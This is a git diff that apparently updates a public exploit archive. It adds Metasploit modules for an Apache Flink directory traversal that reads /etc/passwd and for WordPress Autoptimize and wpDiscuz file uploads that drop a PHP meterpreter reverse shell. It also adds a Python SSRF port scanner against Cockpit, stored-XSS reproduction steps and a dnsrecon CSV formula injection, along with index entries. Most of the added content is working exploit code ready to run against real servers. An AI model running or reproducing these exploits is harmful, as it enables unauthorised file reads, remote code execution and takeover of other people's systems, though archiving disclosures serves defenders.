diff --git a/exploits/java/webapps/49398.rb b/exploits/java/webapps/49398.rb
new file mode 100755
index 000000000..33c1cb1db
--- /dev/null
+++ b/exploits/java/webapps/49398.rb
@@ -0,0 +1,72 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Auxiliary
+ include Msf::Exploit::Remote::HttpClient
+ include Msf::Auxiliary::Scanner
+ include Msf::Auxiliary::Report
+
+ def initialize(info = {})
+ super(update_info(
+ info,
+ 'Name' => 'Apache Flink File Read Vulnerability',
+ 'Description' => %q{
+ This module exploits an unauthenticated directory traversal vulnerability
+ in Apache Flink version 1.11.0 (and released in 1.11.1 and 1.11.2 as well),
+ allowing arbitrary file read with the web server privileges
+ },
+ 'Author' =>
+ [
+ '0rich1 - Ant Security FG Lab', # Vulnerability discovery
+ 'Hoa Nguyen - Suncsr Team', # Metasploit module
+ ],
+ 'License' => MSF_LICENSE,
+ 'References' =>
+ [
+ ['CVE', '2020-17519'],
+ ['URL', 'http://www.openwall.com/lists/oss-security/2021/01/05/2'],
+ ['URL', 'https://www.tenable.com/cve/CVE-2020-17519']
+ ],
+ 'Privileged' => false,
+ 'Platform' => ['php'],
+ 'Arch' => ARCH_PHP,
+ 'Targets' => [['', {}]],
+ 'DefaultTarget' => 0,
+ 'DisclosureDate' => 'Jan 05 2021'
+
+ ))
+
+ register_options([
+ OptInt.new('DEPTH',[true,'Traversal Depth',12]),
+ OptString.new('FILEPATH',[true,'The path file to read','/etc/passwd'])
+ ])
+ end
+
+ def run_host(ip)
+ traversal = '..%252f' * datastore['DEPTH']
+ filename = datastore['FILEPATH'].gsub("/","%252f")
+ filename = filename[1, filename.length] if filename =~ /^\//
+
+ res = send_request_cgi({
+ 'method' => 'GET',
+ 'uri' => normalize_uri(target_uri.path,'jobmanager','logs',"#{traversal}#{filename}"),
+ })
+
+ fail_with Failure::Unreachable, 'Connection failed' unless res fail_with Failure::NotVulnerable, 'Connection failed. Nothingn was downloaded' if res.code != 200
+ fail_with Failure::NotVulnerable, 'Nothing was downloaded. Change the DEPTH parameter' if res.body.length.zero?
+
+ print_status('Downloading file...')
+ print_line("\n#{res.body}\n")
+ fname = datastore['FILEPATH']
+ path = store_loot(
+ 'apache.traversal',
+ 'text/plain',
+ ip,
+ res.body,
+ fname
+ )
+ print_good("File saved in: #{path}")
+ end
+ end
\ No newline at end of file
diff --git a/exploits/multiple/webapps/49397.txt b/exploits/multiple/webapps/49397.txt
new file mode 100644
index 000000000..85aafcb18
--- /dev/null
+++ b/exploits/multiple/webapps/49397.txt
@@ -0,0 +1,88 @@
+# Exploit Title: Cockpit Version 234 - Server-Side Request Forgery (Unauthenticated)
+# Date: 08.01.2021
+# Exploit Author: Metin Yunus Kandemir
+# Vendor Homepage: https://cockpit-project.org/
+# Version: v234
+# Tested on: Ubuntu 18.04
+
+#!/usr/bin/python3
+import argparse
+import requests
+import sys
+import urllib3
+import time
+from colorama import Fore, Style
+from argparse import ArgumentParser, Namespace
+from bs4 import BeautifulSoup
+
+"""
+Example scanning for internal server:
+python3 PoC.py --target 192.168.1.33:9090 --scan 172.16.16.16 --ports 21,22,23
+Example scanning for loopback interface of server:
+python3 PoC.py --target 192.168.1.33:9090
+Description : https://github.com/passtheticket/vulnerability-research/tree/main/cockpitProject/README.md
+"""
+
+def main():
+ dsc = "Cockpit Version 234 - sshd Service Scanning via Server-Side Request Forgery (Unauthenticated)"
+ parser: ArgumentParser = argparse.ArgumentParser(description=dsc)
+ parser.add_argument("--target", help="IP address of Cockpit server", type=str, required=True)
+ parser.add_argument("--scan", help="IP address of server that will be scanned", type=str, required=False)
+ parser.add_argument("--ports", help="Ports (example: 21,22)", type=str, required=False)
+ args: Namespace = parser.parse_args()
+
+ if args.target:
+ target = args.target
+ if args.scan:
+ scan = args.scan
+ if args.ports:
+ ports = args.ports
+ else:
+ ports = "22"
+ else:
+ scan = "127.0.0.1"
+ if args.ports:
+ ports = args.ports
+ else:
+ ports = "22"
+ cockpitReq(target, scan, ports)
+
+def cockpitReq(target, scan, ports):
+ urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
+ portRange = ports.split(",")
+ for unsafe in portRange:
+ headers = {
+ "Host": str(target),
+ "User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0",
+ "Accept": "*/*",
+ "Accept-Language": "en-US,en;q=0.5",
+ "Accept-Encoding": "gzip, deflate",
+ "Authorization": "Basic dW5zYWZlOmlubGluZQ==",
+ "X-Authorize": "",
+ "Connection": "close",
+ "Cookie": "cockpit=deleted",
+ }
+ req = requests.get("http://" + target + "/cockpit+=" + scan + ":" + unsafe + "/login", headers, verify=False)
+ time.sleep(2)
+ soup = BeautifulSoup(req.text, 'html.parser')
+ responseCode = req.status_code
+ responseTime = str(req.elapsed)
+
+ if responseCode == 404:
+ print("Cockpit server was not found!")
+ elif responseCode == 401:
+ if soup.title.string == "Authentication failed":
+ print(Fore.GREEN + Style.BRIGHT + "[+] Port: "+ unsafe + " sshd service is detected!")
+ elif soup.title.string == "Authentication failed: no-host":
+ if responseTime > "0:00:10.000000":
+ print(Fore.GREEN + Style.BRIGHT +"[-] Port: "+ unsafe + " is open, sshd service is not detected!")
+ else:
+ print(Fore.RED + Style.BRIGHT +"[-] Port: "+ unsafe + " sshd service is not detected!")
+ else:
+ print(Fore.RED + Style.BRIGHT +"[-] Error is occured!")
+ print("[-] One bad day!")
+ sys.exit(1)
+ else:
+ print("Something went wrong!")
+
+main()
\ No newline at end of file
diff --git a/exploits/php/webapps/49395.txt b/exploits/php/webapps/49395.txt
new file mode 100644
index 000000000..19936b580
--- /dev/null
+++ b/exploits/php/webapps/49395.txt
@@ -0,0 +1,9 @@
+# Exploit Title: Life Insurance Management System 1.0 - Multiple Stored XSS
+# Date: 4/1/2021
+# Exploit Author: Arnav Tripathy
+# Vendor Homepage: https://www.sourcecodester.com
+# Software Link: https://www.sourcecodester.com/php/14665/life-insurance-management-system-php-full-source-code.html
+# Version: 1.0
+# Tested on: linux / Lamp
+
+Click on add payment once logged in. Put and so on in all parameters. You will notice popup once you navigate to payments.
\ No newline at end of file
diff --git a/exploits/php/webapps/49396.txt b/exploits/php/webapps/49396.txt
new file mode 100644
index 000000000..d54e9824a
--- /dev/null
+++ b/exploits/php/webapps/49396.txt
@@ -0,0 +1,13 @@
+# Exploit Title: Online Doctor Appointment System 1.0 - Multiple Stored XSS
+# Tested on: Windows 10
+# Exploit Author: Mohamed habib Smidi (Craniums)
+# Date: 2021-01-08
+# Vendor Homepage: https://www.sourcecodester.com/php/14663/online-doctor-appointment-system-php-full-source-code.html
+# Software Link: https://www.sourcecodester.com/download-code?nid=14663&title=Online+Doctor+Appointment+System+in+PHP+with+Full+Source+Code
+# Affected Version: Version 1
+
+Step 1: Login to the doctor account in http://TARGET/doctorappointmentsystem/adminlogin.php
+Step 2: then Click on the username and go to profile
+Step 3: Click on Update profile.
+Step 4: Input "" in the field First Name,Last Name and Address.
+Step 5: This Will trigger the payload each time you update or visit a new page.
\ No newline at end of file
diff --git a/exploits/php/webapps/49399.rb b/exploits/php/webapps/49399.rb
new file mode 100755
index 000000000..e7433467c
--- /dev/null
+++ b/exploits/php/webapps/49399.rb
@@ -0,0 +1,109 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+class MetasploitModule < Msf::Exploit::Remote
+ Rank = ExcellentRanking
+
+ include Msf::Exploit::Remote::HTTP::Wordpress
+ include Msf::Exploit::FileDropper
+
+ def initialize(info = {})
+ super(update_info(
+ info,
+ 'Name' => 'Wordpress Autoptimize Authenticated File Upload',
+ 'Description' => %q{
+ The ao_ccss_import AJAX call does not ensure that the file provided is a legitimate Zip file,
+ allowing high privilege users to upload arbitrary files, such as PHP, leading to RCE.
+ },
+ 'Author' =>
+ [
+ 'Khanh Nguyen - Suncsr Team', # Vulnerability discovery
+ 'Hoa Nguyen - Suncsr Team', # Metasploit module
+ 'Thien Ngo - Suncsr Team' # Metasploit module
+ ],
+ 'License' => MSF_LICENSE,
+ 'References' =>
+ [
+ ['CVE', '2020-24948'],
+ ['EDB', '48770'],
+ ['WPVDB', '10372']
+ ],
+ 'Privileged' => false,
+ 'Platform' => ['php'],
+ 'Arch' => ARCH_PHP,
+ 'DefaultOptions' => {
+ 'PAYLOAD' => 'php/meterpreter/reverse_tcp'
+ },
+ 'Targets' => [['WP Autoptimize 2.7.6', {}]],
+ 'DefaultTarget' => 0,
+ 'DisclosureDate' => '2020-08-24'))
+
+ register_options(
+ [
+ OptString.new('USERNAME', [true, 'The WordPress password to authenticate with', nil]),
+ OptString.new('PASSWORD', [true, 'The WordPress username to authenticate with', nil])
+ ])
+ end
+
+ def check
+ check_plugin_version_from_readme('autoptimize','2.7.7')
+ end
+
+ def ao_ccss_import_nonce(cookie)
+ res = send_request_cgi({
+ 'uri' => normalize_uri(wordpress_url_backend,'options-general.php'),
+ 'cookie' => cookie,
+ 'vars_get' => {
+ 'page' => 'ao_critcss'
+ }
+ },5)
+
+ if res.code == 200
+ print_good("Found ao_ccss_import_nonce_code Value!")
+ else
+ fail_with(Failure::Unknown,'Server did not response in an expected way')
+ end
+
+ ao_ccss_import_nonce_code = res.body.match(/'ao_ccss_import_nonce', '(\w+)/).captures[0]
+ return ao_ccss_import_nonce_code
+ end
+
+ def exploit
+ username = datastore['USERNAME']
+ password = datastore['PASSWORD']
+ print_status("Trying to login as #{username}")
+ cookie = wordpress_login(datastore['USERNAME'],datastore['PASSWORD'])
+ if cookie.nil?
+ print_error("Unable to login as #{username}")
+ end
+
+ vars = ao_ccss_import_nonce(cookie)
+ print_status("Trying to upload payload")
+ filename = "#{rand_text_alpha_lower(8)}.php"
+
+ data = Rex::MIME::Message.new
+ data.add_part('ao_ccss_import', nil, nil, 'form-data; name="action"')
+ data.add_part(vars, nil, nil, 'form-data; name="ao_ccss_import_nonce"')
+ data.add_part(payload.encoded, 'application/zip', nil, "form-data; name=\"file\"; filename=\"#{filename}\"")
+ post_data = data.to_s
+ print_status("Uploading payload")
+
+ res = send_request_cgi({
+ 'method' => 'POST',
+ 'uri' => normalize_uri(wordpress_url_backend,'admin-ajax.php'),
+ 'ctype' => "multipart/form-data; boundary=#{data.bound}",
+ 'data' => post_data,
+ 'cookie' => cookie
+ })
+
+ if res.code == 200
+ register_files_for_cleanup(filename)
+ else
+ fail_with(Failure::Unknown,'Server did not response in an expected way')
+ end
+
+ print_status("Calling uploaded file #{filename}")
+ send_request_cgi({'uri' => normalize_uri(wordpress_url_wp_content, 'uploads','ao_ccss',filename)},5)
+ end
+end
\ No newline at end of file
diff --git a/exploits/php/webapps/49401.rb b/exploits/php/webapps/49401.rb
new file mode 100755
index 000000000..220607995
--- /dev/null
+++ b/exploits/php/webapps/49401.rb
@@ -0,0 +1,106 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+ Rank = ExcellentRanking
+
+ include Msf::Exploit::Remote::HTTP::Wordpress
+ include Msf::Exploit::FileDropper
+
+ def initialize(info = {})
+ super(update_info(info,
+ 'Name' => 'WordPress wpDiscuz Unauthen File Upload Vulnerability',
+ 'Description' => %q{
+ This module exploits an arbitrary file upload in the WordPress wpDiscuz plugin
+ version 7.0.4. This flaw gave unauthenticated attackers the ability to upload arbitrary files,
+ including PHP files, and achieve remote code execution on a vulnerable site’s server.
+ },
+ 'Author' =>
+ [
+ 'Chloe Chamberland', # Vulnerability Discovery, initial msf module
+ 'Hoa Nguyen - SunCSR' # Metasploit Module Pull Request
+ ],
+ 'License' => MSF_LICENSE,
+ 'References' =>
+ [
+ ['WPVDB', '10333'],
+ ['URL', 'https://www.wordfence.com/blog/2020/07/critical-arbitrary-file-upload-vulnerability-patched-in-wpdiscuz-plugin/'],
+ ['URL','https://github.com/suncsr/wpDiscuz_unauthenticated_arbitrary_file_upload/blob/main/README.md'],
+ ['URL','https://plugins.trac.wordpress.org/changeset/2345429/wpdiscuz']
+ ],
+ 'Privileged' => false,
+ 'Platform' => 'php',
+ 'Arch' => ARCH_PHP,
+ 'Targets' => [['wpDiscuz < 7.0.5', {}]],
+ 'DisclosureDate' => 'Feb 21 2020',
+ 'DefaultOptions' =>
+ {
+ 'PAYLOAD' => 'php/meterpreter/reverse_tcp'
+ },
+ 'DefaultTarget' => 0))
+
+ register_options [
+ OptString.new('BLOGPATH',[true,'Link to the post [/index.php/2020/12/12/post1]', nil]),
+ ]
+ end
+
+ def check
+ check_plugin_version_from_readme('wpdiscuz','7.0.5')
+ end
+
+ def blogpath
+ datastore['BLOGPATH']
+ end
+
+ def find_wmusecurity_id
+ res = send_request_cgi({ 'uri' => normalize_uri(target_uri.path, blogpath)},5)
+ wmusecurity_id = res.body.match(/wmuSecurity":"(\w+)/).captures
+ return wmusecurity_id
+ end
+
+ def exploit
+ wmusecurity_id = find_wmusecurity_id[0]
+ php_page_name = rand_text_alpha(5 + rand(5)) + '.php'
+ data = Rex::MIME::Message.new
+ data.add_part('wmuUploadFiles', nil, nil, 'form-data; name="action"')
+ data.add_part(wmusecurity_id, nil, nil, 'form-data; name="wmu_nonce"')
+ data.add_part('undefined', nil, nil, 'form-data; name="wmuAttachmentsData"')
+ data.add_part('1', nil, nil, 'form-data; name="postId"')
+ data.add_part('GIF8' + payload.encoded, 'image/gif', nil, "form-data; name=\"wmu_files[0]\"; filename=\"#{php_page_name}\"")
+ post_data = data.to_s
+
+ res = send_request_cgi(
+ 'uri' => normalize_uri(target_uri.path ,'wp-admin', 'admin-ajax.php'),
+ 'method' => 'POST',
+ 'ctype' => "multipart/form-data; boundary=#{data.bound}",
+ 'data' => post_data
+ )
+
+ time = Time.new
+ year = time.year.to_s
+ month = "%02d" % time.month
+
+ regex = res.body.match(/https?:\\\/\\\/[\w\\\/\-\.:]+\.php/)
+ wp_shell_upload = /\/\w+-\d+\.\d+\.php/.match(regex.to_s).to_s.tr('/',"")
+
+ if res
+ if res.code == 200 && res.body =~ /#{php_page_name}/
+ print_good("Payload uploaded as #{php_page_name}")
+ register_files_for_cleanup(php_page_name)
+ else
+ fail_with(Failure::UnexpectedReply, "#{peer} - Unable to deploy payload, server returned #{res.code}")
+ end
+ else
+ fail_with(Failure::Unknown, "#{peer} - Server did not answer")
+ end
+
+ print_status("Calling payload...")
+ send_request_cgi(
+ { 'uri' => normalize_uri(wordpress_url_wp_content, 'uploads', "#{year}","#{month}",wp_shell_upload)},
+ 5
+ )
+
+ end
+end
\ No newline at end of file
diff --git a/exploits/python/local/49394.txt b/exploits/python/local/49394.txt
new file mode 100644
index 000000000..668c5999c
--- /dev/null
+++ b/exploits/python/local/49394.txt
@@ -0,0 +1,37 @@
+# Exploit Title: dnsrecon 0.10.0 - CSV Injection
+# Author: Dolev Farhi
+# Date: 2021-01-07
+# Vendor Homepage: https://github.com/darkoperator/dnsrecon/
+# Version : 0.10.0
+# Tested on: ParrotOS 4.10
+
+dnsrecon, when scanning a TXT record such as SPF, i.e.: _spf.domain.com, outputs a CSV report (-c out.csv) with entries such as Type,Name,Address,Target,Port and String.
+A TXT record allows many characters including single quote and equal signs, it's possible to escape the CSV structure by creating a TXT record in the following way:
+
+_spf.example.com "test',=1+1337,'z"
+
+
+user@parrot-virtual:~$ sudo dnsrecon -d _spf.example.com -c ./file.csv -n 8.8.8.8
+[*] Performing General Enumeration of Domain: _spf.example.com
+[-] DNSSEC is not configured for _spf.example.com
+[*] SOA ns-59.awsdns-07.com 205.1.1.1
+[-] Could not Resolve NS Records for _spf.example.com
+[-] Could not Resolve MX Records for _spf.example.com
+[*] TXT _spf.example.com test',=1+1337,'z
+[*] Enumerating SRV Records
+[+] 0 Records Found
+[*] Saving records to CSV file: ./file.csv
+{'type': 'SOA', 'mname': 'ns-59.awsdns-07.com', 'address': '205.1.1.1'}
+{'type': 'TXT', 'name': '_spf.example.com', 'strings': "test',=1+1337,'z"}
+
+
+This output will then be rewritten into a CSV with this structure:
+
+Type,Name,Address,Target,Port,String
+SOA,ns-59.awsdns-07.com,205.1.1.1
+TXT,_spf.example.com,,,,'test',=1+1337,'z'
+
+The flexibility of TXT record allows many variants of formulas to be injected, from RFC1464 https://tools.ietf.org/html/rfc1464:
+
+Attribute Values
+ All printable ASCII characters are permitted in the attribute value.
\ No newline at end of file
diff --git a/exploits/windows/remote/46697.py b/exploits/windows/remote/46697.py
index 3b65609ac..0c3040b61 100755
--- a/exploits/windows/remote/46697.py
+++ b/exploits/windows/remote/46697.py
@@ -5,9 +5,9 @@
# Version: 3.008
# Tested on: Windows 10
-Remote Mouse 3.008 fails to check for authenication and will execute any command any machine gives it
-This script pops calc as proof of concept (albeit a bit slowly)
-It also has an index of the keycodes the app uses to communicate with the computer if you want to mess around with it yourself
+#Remote Mouse 3.008 fails to check for authenication and will execute any command any machine gives it
+#This script pops calc as proof of concept (albeit a bit slowly)
+#It also has an index of the keycodes the app uses to communicate with the computer if you want to mess around with it yourself
#!/usr/bin/python2
diff --git a/exploits/windows/remote/643.c b/exploits/windows/remote/643.c
index 670dd0d2f..245665a18 100644
--- a/exploits/windows/remote/643.c
+++ b/exploits/windows/remote/643.c
@@ -9,7 +9,7 @@
#include
#include
-define retadd "\x9f\x45\x3a\x77" /*win2k server sp4 0x773a459f*/
+#define retadd "\x9f\x45\x3a\x77" /*win2k server sp4 0x773a459f*/
#define port 110
/* revshell العراق القراصنة المجموعة*/
diff --git a/files_exploits.csv b/files_exploits.csv
index 7fe8e8e3e..2063543ff 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -11243,6 +11243,7 @@ id,file,description,date,author,type,platform,port
49379,exploits/windows/local/49379.txt,"WinAVR Version 20100110 - Insecure Folder Permissions",2021-01-06,"Mohammed Alshehri",local,windows,
49382,exploits/windows/local/49382.ps1,"PaperStream IP (TWAIN) 1.42.0.5685 - Local Privilege Escalation",2021-01-06,1F98D,local,windows,
49384,exploits/java/local/49384.txt,"H2 Database 1.4.199 - JNI Code Execution",2021-01-06,1F98D,local,java,
+49394,exploits/python/local/49394.txt,"dnsrecon 0.10.0 - CSV Injection",2021-01-08,"Dolev Farhi",local,python,
1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@@ -30834,7 +30835,7 @@ id,file,description,date,author,type,platform,port
26463,exploits/cgi/webapps/26463.txt,"Simple PHP Blog 0.4 - 'colors.php' Multiple Cross-Site Scripting Vulnerabilities",2005-11-02,enji@infosys.tuwien.ac.at,webapps,cgi,
26465,exploits/php/webapps/26465.txt,"CuteNews 1.4.1 - 'show_archives.php' Traversal Arbitrary File Access",2005-11-02,retrogod@aliceposta.it,webapps,php,
26466,exploits/php/webapps/26466.txt,"CuteNews 1.4.1 - 'template' Traversal Arbitrary File Access",2005-11-02,retrogod@aliceposta.it,webapps,php,
-26467,exploits/php/webapps/26467.txt,"PHP Handicapper - 'Process_signup.php' HTTP Response Splitting",2005-11-03,BiPi_HaCk,webapps,php,
+26467,exploits/php/webapps/26467.txt,"PHP Handicapper (2005) - 'Process_signup.php' HTTP Response Splitting",2005-11-03,BiPi_HaCk,webapps,php,
26468,exploits/php/webapps/26468.pl,"Galerie 2.4 - 'showgallery.php' SQL Injection",2005-11-03,abducter_minds@yahoo.com,webapps,php,
26469,exploits/php/webapps/26469.txt,"JPortal Web Portal 2.2.1/2.3.1 - 'comment.php' SQL Injection",2005-11-04,Mousehack,webapps,php,
26470,exploits/php/webapps/26470.txt,"JPortal Web Portal 2.2.1/2.3.1 - 'news.php' SQL Injection",2005-11-04,Mousehack,webapps,php,
@@ -43601,3 +43602,9 @@ id,file,description,date,author,type,platform,port
49391,exploits/php/webapps/49391.txt,"Curfew e-Pass Management System 1.0 - Stored XSS",2021-01-07,"Arnav Tripathy",webapps,php,
49392,exploits/php/webapps/49392.txt,"ECSIMAGING PACS 6.21.5 - SQL injection",2021-01-07,shoxxdj,webapps,php,
49393,exploits/php/webapps/49393.txt,"CRUD Operation 1.0 - Multiple Stored XSS",2021-01-07,"Arnav Tripathy",webapps,php,
+49395,exploits/php/webapps/49395.txt,"Life Insurance Management System 1.0 - Multiple Stored XSS",2021-01-08,"Arnav Tripathy",webapps,php,
+49396,exploits/php/webapps/49396.txt,"Online Doctor Appointment System 1.0 - Multiple Stored XSS",2021-01-08,"Mohamed habib Smidi",webapps,php,
+49397,exploits/multiple/webapps/49397.txt,"Cockpit Version 234 - Server-Side Request Forgery (Unauthenticated)",2021-01-08,"Metin Yunus Kandemir",webapps,multiple,
+49398,exploits/java/webapps/49398.rb,"Apache Flink 1.11.0 - Unauthenticated Arbitrary File Read (Metasploit)",2021-01-08,"SunCSR Team",webapps,java,
+49399,exploits/php/webapps/49399.rb,"WordPress Plugin Autoptimize 2.7.6 - Authenticated Arbitrary File Upload (Metasploit)",2021-01-08,"SunCSR Team",webapps,php,
+49401,exploits/php/webapps/49401.rb,"Wordpress Plugin wpDiscuz 7.0.4 - Unauthenticated Arbitrary File Upload (Metasploit)",2021-01-08,"SunCSR Team",webapps,php,